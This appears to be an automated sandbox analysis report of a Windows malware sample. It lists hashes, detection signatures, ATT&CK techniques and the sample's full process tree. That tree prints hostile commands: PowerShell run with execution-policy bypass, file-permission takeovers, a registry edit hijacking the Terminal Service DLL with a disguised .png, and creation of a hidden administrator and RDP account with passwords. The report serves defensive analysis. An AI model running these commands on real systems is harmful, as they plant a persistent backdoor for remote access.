Analysis

  • max time kernel
    133s
  • max time network
    111s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    09-11-2020 21:57

General

  • Target

    5a79eba3f9e0e2ab3982c4512195f3f9e4b7b7f56b8993cfff69dfb47567bbe5.exe

  • Size

    3.1MB

  • MD5

    51c65f4486f9c76e90e3cde6a29f552d

  • SHA1

    cef1e7f6317a2f49836b9012c6396a7765516b6d

  • SHA256

    5a79eba3f9e0e2ab3982c4512195f3f9e4b7b7f56b8993cfff69dfb47567bbe5

  • SHA512

    49b3336b62a41facafa6aa37bffa1f467bab8ff5effc4eede9966baa7fcfba613a2b51f979d9fce324324fa76f8d664fde83cf609996e9436f9b4c0d0a28a824

Malware Config

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Modifies RDP port number used by Windows 1 TTPs
  • Possible privilege escalation attempt 8 IoCs
  • Sets DLL path for service in the registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 2 IoCs
  • Modifies file permissions 1 TTPs 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Modifies service 2 TTPs 2 IoCs
  • Drops file in Windows directory 8 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: LoadsDriver 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 130 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5a79eba3f9e0e2ab3982c4512195f3f9e4b7b7f56b8993cfff69dfb47567bbe5.exe
    "C:\Users\Admin\AppData\Local\Temp\5a79eba3f9e0e2ab3982c4512195f3f9e4b7b7f56b8993cfff69dfb47567bbe5.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1924
    • \??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
      -ep bypass -noexit -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
      2⤵
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1684
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\q13viief\q13viief.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1844
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES24A0.tmp" "c:\Users\Admin\AppData\Local\Temp\q13viief\CSCAC3E2C806BE7499AB3FB6A73F487443E.TMP"
          4⤵
            PID:412
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1468
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:760
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1644
        • C:\Windows\system32\takeown.exe
          "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1048
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1740
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:668
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1368
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:512
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1064
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1628
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:920
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
          3⤵
            PID:320
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            3⤵
            • Modifies service
            • Modifies registry key
            PID:1464
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
            3⤵
              PID:1108
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1600
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                4⤵
                  PID:1456
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1164
                • C:\Windows\system32\cmd.exe
                  cmd /c net start rdpdr
                  4⤵
                    PID:316
                    • C:\Windows\system32\net.exe
                      net start rdpdr
                      5⤵
                        PID:1928
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 start rdpdr
                          6⤵
                            PID:360
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                      3⤵
                        PID:1844
                        • C:\Windows\system32\cmd.exe
                          cmd /c net start TermService
                          4⤵
                            PID:1468
                            • C:\Windows\system32\net.exe
                              net start TermService
                              5⤵
                                PID:1612
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 start TermService
                                  6⤵
                                    PID:1724
                            • C:\Windows\system32\cmd.exe
                              "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                              3⤵
                                PID:856
                              • C:\Windows\system32\cmd.exe
                                "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                                3⤵
                                  PID:1080
                            • C:\Windows\System32\cmd.exe
                              cmd /C net.exe user wgautilacc Ghar4f5 /del
                              1⤵
                                PID:1104
                                • C:\Windows\system32\net.exe
                                  net.exe user wgautilacc Ghar4f5 /del
                                  2⤵
                                    PID:1756
                                    • C:\Windows\system32\net1.exe
                                      C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
                                      3⤵
                                        PID:1628
                                  • C:\Windows\System32\cmd.exe
                                    cmd /C net.exe user wgautilacc PguA1m8Y /add
                                    1⤵
                                      PID:1904
                                      • C:\Windows\system32\net.exe
                                        net.exe user wgautilacc PguA1m8Y /add
                                        2⤵
                                          PID:1152
                                          • C:\Windows\system32\net1.exe
                                            C:\Windows\system32\net1 user wgautilacc PguA1m8Y /add
                                            3⤵
                                              PID:1132
                                        • C:\Windows\System32\cmd.exe
                                          cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                                          1⤵
                                            PID:908
                                            • C:\Windows\system32\net.exe
                                              net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                                              2⤵
                                                PID:1540
                                                • C:\Windows\system32\net1.exe
                                                  C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                                                  3⤵
                                                    PID:360
                                              • C:\Windows\System32\cmd.exe
                                                cmd /C net.exe LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD
                                                1⤵
                                                  PID:1164
                                                  • C:\Windows\system32\net.exe
                                                    net.exe LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD
                                                    2⤵
                                                      PID:944
                                                      • C:\Windows\system32\net1.exe
                                                        C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD
                                                        3⤵
                                                          PID:932
                                                    • C:\Windows\System32\cmd.exe
                                                      cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
                                                      1⤵
                                                        PID:668
                                                        • C:\Windows\system32\net.exe
                                                          net.exe LOCALGROUP "Administrators" wgautilacc /ADD
                                                          2⤵
                                                            PID:1756
                                                            • C:\Windows\system32\net1.exe
                                                              C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
                                                              3⤵
                                                                PID:1940
                                                          • C:\Windows\System32\cmd.exe
                                                            cmd /C net.exe user wgautilacc PguA1m8Y
                                                            1⤵
                                                              PID:572
                                                              • C:\Windows\system32\net.exe
                                                                net.exe user wgautilacc PguA1m8Y
                                                                2⤵
                                                                  PID:1152
                                                                  • C:\Windows\system32\net1.exe
                                                                    C:\Windows\system32\net1 user wgautilacc PguA1m8Y
                                                                    3⤵
                                                                      PID:1132
                                                                • C:\Windows\System32\cmd.exe
                                                                  cmd.exe /C net user wgautilacc 1234
                                                                  1⤵
                                                                    PID:1224
                                                                    • C:\Windows\system32\net.exe
                                                                      net user wgautilacc 1234
                                                                      2⤵
                                                                        PID:1180
                                                                        • C:\Windows\system32\net1.exe
                                                                          C:\Windows\system32\net1 user wgautilacc 1234
                                                                          3⤵
                                                                            PID:1704

                                                                      Network

                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                      Persistence

                                                                      Account Manipulation

                                                                      1
                                                                      T1098

                                                                      Registry Run Keys / Startup Folder

                                                                      1
                                                                      T1060

                                                                      Modify Existing Service

                                                                      1
                                                                      T1031

                                                                      Defense Evasion

                                                                      Modify Registry

                                                                      3
                                                                      T1112

                                                                      File Permissions Modification

                                                                      1
                                                                      T1222

                                                                      Lateral Movement

                                                                      Remote Desktop Protocol

                                                                      1
                                                                      T1076

                                                                      Replay Monitor

                                                                      Loading Replay Monitor...

                                                                      Downloads

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4eda7647-a19e-437c-b5e4-e1e6e3eef19e
                                                                        MD5

                                                                        6f0d509e28be1af95ba237d4f43adab4

                                                                        SHA1

                                                                        c665febe79e435843553bee86a6cea731ce6c5e4

                                                                        SHA256

                                                                        f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e

                                                                        SHA512

                                                                        8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_abb09ea4-4a5f-4661-85cf-36b477f6f256
                                                                        MD5

                                                                        faa37917b36371249ac9fcf93317bf97

                                                                        SHA1

                                                                        a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4

                                                                        SHA256

                                                                        b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132

                                                                        SHA512

                                                                        614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b922d3a1-0aa9-42e7-b8f0-21b65a2cb7b5
                                                                        MD5

                                                                        2d5cd190b5db0620cd62e3cd6ba1dcd3

                                                                        SHA1

                                                                        ff4f229f4fbacccdf11d98c04ba756bda80aac7a

                                                                        SHA256

                                                                        ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d

                                                                        SHA512

                                                                        edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bb9b5da2-48b7-4dc7-bc1b-054a5f72d298
                                                                        MD5

                                                                        e5b3ba61c3cf07deda462c9b27eb4166

                                                                        SHA1

                                                                        b324dad73048be6e27467315f82b7a5c1438a1f9

                                                                        SHA256

                                                                        b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925

                                                                        SHA512

                                                                        a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d9cd149b-91df-4d50-8dd8-a2622c9798f1
                                                                        MD5

                                                                        7f79b990cb5ed648f9e583fe35527aa7

                                                                        SHA1

                                                                        71b177b48c8bd745ef02c2affad79ca222da7c33

                                                                        SHA256

                                                                        080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683

                                                                        SHA512

                                                                        20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_dd730a3a-6bb9-4149-a116-77b4ec2968ac
                                                                        MD5

                                                                        a70ee38af4bb2b5ed3eeb7cbd1a12fa3

                                                                        SHA1

                                                                        81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9

                                                                        SHA256

                                                                        dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d

                                                                        SHA512

                                                                        8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_dd977f4c-d61f-4c5c-a628-33b638f55686
                                                                        MD5

                                                                        d89968acfbd0cd60b51df04860d99896

                                                                        SHA1

                                                                        b3c29916ccb81ce98f95bbf3aa8a73de16298b29

                                                                        SHA256

                                                                        1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9

                                                                        SHA512

                                                                        b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                                                                        MD5

                                                                        6d220f9b368cddcbf144f3a7f30c8b94

                                                                        SHA1

                                                                        f42a7a64457191b1e18178756cb8a8e0f6d38105

                                                                        SHA256

                                                                        aee0401f23eaad3281973080e7c800bb18473f378f0ca63e8637fdd9e038b49c

                                                                        SHA512

                                                                        aed4501642a1f367a6095ac2f834e3aa736694ef248deea310994ffade5425930d6332204630778006f9e490739616cc227bf9e4b43c80a0e97b5dc29558f4c7

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                                                                        MD5

                                                                        2bbcab06099b1b9685911724721cde1b

                                                                        SHA1

                                                                        9ad5146e892768b128406905d288b063b2d392bc

                                                                        SHA256

                                                                        f62ec6c58b25027d7cc9fe30da6124ab89f362b12da1f566c380b8e5e33f8182

                                                                        SHA512

                                                                        b6d777a2a07ef182d4868d75db44737b15e57adfce272cf725ad345fa9371835fe98c23a1f67613a51705f0501cd204abc50fbed5575f544c16b7e4a48cfb692

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                                                                        MD5

                                                                        75163a84992cb614ccbc952aaa989a60

                                                                        SHA1

                                                                        9b60fe30421269b2da9dd7659ac87fb92bc26d1f

                                                                        SHA256

                                                                        9432e569c3dc8f333aa5588337dde74a101de5a073757e3a5067e894a74ae9ee

                                                                        SHA512

                                                                        29dd43acced0b43266a57741552a8b28b2e255373e2d77fab22ac76f5318416bacf75de464bab50e6289ffad24d4f65e10e2c0ff5c7f710be3f04e38efe121e3

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                                                                        MD5

                                                                        9070acbcb17448560aaa3ed393d419a5

                                                                        SHA1

                                                                        cb1e503eeb54def20d3c64f7565ad0f348bd686d

                                                                        SHA256

                                                                        3f1708e0aec93513f1208bd7dea9e0b82012efea59febfd758bd783e9a4964f1

                                                                        SHA512

                                                                        d134f2fb8f64bde2b50bde764066e5b6be6aeac1cc1e5e354984bb55e2515560bb1ae21d1a5bf23fe09cf7654c9c7fbaa7aac680ba732c9175bece118302faa3

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                                                                        MD5

                                                                        9df2fbde7a2864865e1633e8fb4ed0e2

                                                                        SHA1

                                                                        18ad23b552cac6c0147340380f98c15eb1e11b54

                                                                        SHA256

                                                                        662382846fd7283128b9f630ad302de7ee7f6c8a66be1e8a471ff519ad578ec1

                                                                        SHA512

                                                                        63d53e278cd6c57b21463846e17a2131cc41c4a10f911514ec9773ec90e57b788ec2aa2e5c172c23821dc367afb65223eb2fe841582475179bc2ed55eef0ac30

                                                                      • C:\Users\Admin\AppData\Local\Temp\RES24A0.tmp
                                                                        MD5

                                                                        7f771d80c8407a853fe06e4a3ad7ea0e

                                                                        SHA1

                                                                        2601929972f4423c05a6c97e06304530cffb3106

                                                                        SHA256

                                                                        1d3b6d360855745f34ba25b968986b760e6b34aaf05b5964f17210a4ac47544b

                                                                        SHA512

                                                                        2f07867c1e5e3d4855452cc639f5d3f9cc3d2ed9938d0dfe4c40ca4d35e4047d2a0340b93520147cae3d6f5abba1e6b6c1ddd0bedb2a33873c2e71996b823b05

                                                                      • C:\Users\Admin\AppData\Local\Temp\get-points.ps1
                                                                        MD5

                                                                        41d1a9d1cbee90f1e5f27fdfb299f8b8

                                                                        SHA1

                                                                        1e9ac27006a7c364649265246fccbd719418ceab

                                                                        SHA256

                                                                        0f6c089b4cefa4a454150f08519573283b1a38e2c19cd7b04855a05d686d41b4

                                                                        SHA512

                                                                        f178f88d0491cf72c3d4d591ab1d428691474a4c443822a0d270555c9dc4d05932057847b0e7106d564e6c9ddb33c0649e472258afca10696edc3dbb00f33422

                                                                      • C:\Users\Admin\AppData\Local\Temp\q13viief\q13viief.dll
                                                                        MD5

                                                                        33165e318557b64df8b32b92a126f340

                                                                        SHA1

                                                                        3c74ba403cdcd7ac741d793585742317bd293ad2

                                                                        SHA256

                                                                        9295add57977fb2fa2dc09dcbc2ce9cd8b4e94985a151234ce4d7aaedbaf4507

                                                                        SHA512

                                                                        6c8f3d5c4aef0f0f56b6f0c328435a01e37aa6a14503c8d6fcca7090cb826c974570c53021078ce442b92e634ebe62b52b998d393eb80fde4ec57baf6819079c

                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                                                        MD5

                                                                        1ecc66674e148bdf9aa99a7159f91e2b

                                                                        SHA1

                                                                        06554b5016d590c489826ea54f181da8f2d27808

                                                                        SHA256

                                                                        a626f08e7f6b0a6f3373fb4f13e9ddddf48419417f3acdce50a7f718c9aeeddf

                                                                        SHA512

                                                                        3f801a8e4661c4c0c62df6d55340cc5ddd07c1832991b51832b232f8c8b7e1c3c9726ff80a47b65a50a77b6e4d98e1d36c45a588f16599cd15b7d3532a300799

                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                                                        MD5

                                                                        1ecc66674e148bdf9aa99a7159f91e2b

                                                                        SHA1

                                                                        06554b5016d590c489826ea54f181da8f2d27808

                                                                        SHA256

                                                                        a626f08e7f6b0a6f3373fb4f13e9ddddf48419417f3acdce50a7f718c9aeeddf

                                                                        SHA512

                                                                        3f801a8e4661c4c0c62df6d55340cc5ddd07c1832991b51832b232f8c8b7e1c3c9726ff80a47b65a50a77b6e4d98e1d36c45a588f16599cd15b7d3532a300799

                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                                                        MD5

                                                                        1ecc66674e148bdf9aa99a7159f91e2b

                                                                        SHA1

                                                                        06554b5016d590c489826ea54f181da8f2d27808

                                                                        SHA256

                                                                        a626f08e7f6b0a6f3373fb4f13e9ddddf48419417f3acdce50a7f718c9aeeddf

                                                                        SHA512

                                                                        3f801a8e4661c4c0c62df6d55340cc5ddd07c1832991b51832b232f8c8b7e1c3c9726ff80a47b65a50a77b6e4d98e1d36c45a588f16599cd15b7d3532a300799

                                                                      • C:\Windows\system32\rfxvmt.dll
                                                                        MD5

                                                                        dc39d23e4c0e681fad7a3e1342a2843c

                                                                        SHA1

                                                                        58fd7d50c2dca464a128f5e0435d6f0515e62073

                                                                        SHA256

                                                                        6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

                                                                        SHA512

                                                                        5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

                                                                      • \??\PIPE\lsarpc
                                                                        MD5

                                                                        d41d8cd98f00b204e9800998ecf8427e

                                                                        SHA1

                                                                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                        SHA256

                                                                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                        SHA512

                                                                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                      • \??\PIPE\lsarpc
                                                                        MD5

                                                                        d41d8cd98f00b204e9800998ecf8427e

                                                                        SHA1

                                                                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                        SHA256

                                                                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                        SHA512

                                                                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                      • \??\PIPE\samr
                                                                        MD5

                                                                        d41d8cd98f00b204e9800998ecf8427e

                                                                        SHA1

                                                                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                        SHA256

                                                                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                        SHA512

                                                                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                      • \??\PIPE\samr
                                                                        MD5

                                                                        d41d8cd98f00b204e9800998ecf8427e

                                                                        SHA1

                                                                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                        SHA256

                                                                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                        SHA512

                                                                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\q13viief\CSCAC3E2C806BE7499AB3FB6A73F487443E.TMP
                                                                        MD5

                                                                        d95fb819ba2194f19ac06e4965f76347

                                                                        SHA1

                                                                        258192406e0ace89ff0acd4d727c0ffe2bfa4891

                                                                        SHA256

                                                                        09a62fadeb94c90ec00778cb37441c2e5af30c4e0150bab25c2e72d35e2bd6e7

                                                                        SHA512

                                                                        0b61caf69e86ae02eb7e8eae64119097596d64d4bef88ab6719d17051040fe0a693e43fb34ed3d0e12cb5b9c526ae526a79c0d48e70f86f9495d2563bdb376e7

                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\q13viief\q13viief.0.cs
                                                                        MD5

                                                                        8e55cb0ca998472ab6d3e295e0c4dd50

                                                                        SHA1

                                                                        407d07a29b89fc3afc246c0680d5857e3f51019d

                                                                        SHA256

                                                                        63e03eacae29a0d2187103f57a01a5e92ecb3b83a0452e05926303ab57a86685

                                                                        SHA512

                                                                        c51982ecdad9a366544cfb68a52808f6a54ed45c1e5b384c0ac5354fe713c18a16c90ee57e0d018caad02f7f293677c62f4c8a9a51bdea143f3afe593172bd28

                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\q13viief\q13viief.cmdline
                                                                        MD5

                                                                        bbb17d752391eff9aa26a22aba196d0c

                                                                        SHA1

                                                                        c9bc223bdbce41e226e6e97efd114fbc0c1b9204

                                                                        SHA256

                                                                        d090ec3138f0635694112166baa9b216a996705ebfcf874f39dd32079263bfda

                                                                        SHA512

                                                                        2b129bf67afe79cb27c6da38a4e845d0f7006891723b3df4d11b6f03e4cf5c7e17e364324356f18feda8cbfcdaaf44c7961b0cf5cca7621d24109827e04f4458

                                                                      • \Windows\Branding\mediasrv.png
                                                                        MD5

                                                                        37fb7ba711ffbe9d6ebb27d54e827966

                                                                        SHA1

                                                                        4d4d9303e011bcb14720b24239a1aacd58122f47

                                                                        SHA256

                                                                        81b857da0878a957125253a0a5eb80d64c7ab9826797304813d8ed3c3e7f84c5

                                                                        SHA512

                                                                        3f0358b9e7d89fba96e6e9bbe804c26b886a4678a6aa49bc2e784bf180b86c863e3e9a54da71f6856f5b4bb7d28b4e56269dbf31015fdba3b4b808eb66e3aedf

                                                                      • \Windows\Branding\mediasvc.png
                                                                        MD5

                                                                        2f916498a393e2f0d008d33a74c062ba

                                                                        SHA1

                                                                        404d52d4253ef3843ae3f2c4aff050f37fcd3f08

                                                                        SHA256

                                                                        d5038b5227bc35e157dd225c7bb54f0bcf3ba8d8b48cbb930b4ccb65c23d3412

                                                                        SHA512

                                                                        d952a820a966c6cadc1750947d053d01e4e6476d074b6cd460555cc9f8417bd7412beebb65cfa8a121edcce9aab110a5909251146fce703d1b4e984788486f10

                                                                      • memory/316-101-0x0000000000000000-mapping.dmp
                                                                      • memory/320-94-0x0000000000000000-mapping.dmp
                                                                      • memory/360-116-0x0000000000000000-mapping.dmp
                                                                      • memory/360-103-0x0000000000000000-mapping.dmp
                                                                      • memory/412-13-0x0000000000000000-mapping.dmp
                                                                      • memory/512-90-0x0000000000000000-mapping.dmp
                                                                      • memory/668-88-0x0000000000000000-mapping.dmp
                                                                      • memory/760-35-0x000007FEF5410000-0x000007FEF5DFC000-memory.dmp
                                                                        Filesize

                                                                        9.9MB

                                                                      • memory/760-31-0x0000000000000000-mapping.dmp
                                                                      • memory/856-125-0x0000000000000000-mapping.dmp
                                                                      • memory/920-93-0x0000000000000000-mapping.dmp
                                                                      • memory/932-118-0x0000000000000000-mapping.dmp
                                                                      • memory/944-117-0x0000000000000000-mapping.dmp
                                                                      • memory/1048-85-0x0000000000000000-mapping.dmp
                                                                      • memory/1064-91-0x0000000000000000-mapping.dmp
                                                                      • memory/1080-126-0x0000000000000000-mapping.dmp
                                                                      • memory/1108-96-0x0000000000000000-mapping.dmp
                                                                      • memory/1132-124-0x0000000000000000-mapping.dmp
                                                                      • memory/1132-113-0x0000000000000000-mapping.dmp
                                                                      • memory/1152-123-0x0000000000000000-mapping.dmp
                                                                      • memory/1152-112-0x0000000000000000-mapping.dmp
                                                                      • memory/1164-100-0x0000000000000000-mapping.dmp
                                                                      • memory/1180-129-0x0000000000000000-mapping.dmp
                                                                      • memory/1368-89-0x0000000000000000-mapping.dmp
                                                                      • memory/1456-98-0x0000000000000000-mapping.dmp
                                                                      • memory/1464-95-0x0000000000000000-mapping.dmp
                                                                      • memory/1468-22-0x0000000000000000-mapping.dmp
                                                                      • memory/1468-36-0x00000000023A0000-0x00000000023A1000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/1468-24-0x000007FEF5410000-0x000007FEF5DFC000-memory.dmp
                                                                        Filesize

                                                                        9.9MB

